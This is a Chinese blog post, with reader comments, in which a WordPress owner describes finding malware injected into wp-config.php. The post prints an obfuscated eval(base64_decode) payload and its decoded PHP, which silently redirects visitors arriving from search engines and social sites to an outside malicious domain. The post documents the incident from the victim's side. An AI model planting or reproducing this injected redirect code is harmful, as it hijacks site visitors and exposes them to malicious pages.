首先感谢党,感谢人民,感谢给我挂马的人。
晚上打开博客,Chrome提示这个:
好吧,我被挂马了,提示有恶意软件,点击安全诊断页面链接后,接着在谷歌站长工具那各种查,说我是2.23号检测到恶意软件,于是我打开FTP,检查博客程序,查看2.23号被修改过的。结果没有,我又看24号被修改过的,只有.htaccess和sitemap.xml,检查过也没错。
orz,然后继续百度,各种查,把主题啥的都下载了检查,专门正对iframe, js等做了详细检查,发现还是找不出错误。
这时,我把Google报毒那里提示有毒的网站丢谷歌里搜索了下,开了几十个网站,突然找到了这个博客。感谢这位兄弟,否则我还没想到wp-config.php会被挂马。
打开wp-config.php,果然一大段醒目的eval代码。如下:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKC
EkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9
TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyK
CRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyK
CRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzd
HIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0
cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIH
N0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVw
b24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlci
widGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw
/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cm
wvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKC
RyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpI
HsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW
51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQple
Gl0KCk7DQp9DQp9DQp9DQp9"));
经过解密后:
error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://froling.bee.pl/"); exit(); } } } }
果然就看到这个醒目的网站, fuck the website!
最后,我查看了一下我的wp-config.php的修改时间,是2.14号,也就是说早就被挂马了,只是谷歌放检测到!!!!
于是我又检查了我同一个虚拟主机下的另外一个博客,悲剧的是,在更早之前,1.30号就被挂过了。。。。
在解决这个问题的过程中,查了很多网站,总结一下:
常在河边走,哪有不湿鞋,多挂几次就习惯了 ;)
还好,不是全站php文件被感染,,比我好过多了
以前也被挂过木马。。。最近是被挂了黑链。。郁闷。。。
无压力哈~~~~
没事做,来你博客看看。
这么危险啊,还有挂马的风险,
来你博客逛下!
一般都是服务器的安全不行吧。
嗯,应该是主机被入侵了。
有没有检查是如何被入侵的呢?
80端口。。。这个我就没法管了。。。。
我也被挂过,而且严重的是感染了所有的JS文件,主机上几百个js文件,处理了一整天
晕,这样的话,我可能就直接恢复备份得了。。。
问题是之前没发觉,备份里面的js也是被感染的
。。。那就悲剧了,其实我这个也已经潜伏了20多天,要不是google检测到,我也还一直悲剧着呢。。。
为毛哥的两个博客都没有挂马?
你这问的是废话~~~
難道是母機被入侵了導致集體種馬么
应该是这样的,我太悲剧了
感覺應該是這種原因的說
不是所有网站都能被挂马
能挂马说明你的网站是有一定人气的